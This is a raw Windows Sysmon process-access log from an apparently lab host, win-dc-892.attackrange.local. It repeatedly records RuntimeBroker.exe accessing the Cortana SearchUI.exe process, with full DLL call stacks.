12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007201Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007200Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245960C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007199Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49244456C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007198Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007197Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245960C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007196Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49244456C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007195Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49244504C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007194Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245796C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007193Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245796C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007192Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49244504C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007191Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007190Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007189Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245376C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007188Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245480C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007187Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245376C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007186Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245480C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007185Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246036C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007184Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246036C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007183Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245636C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3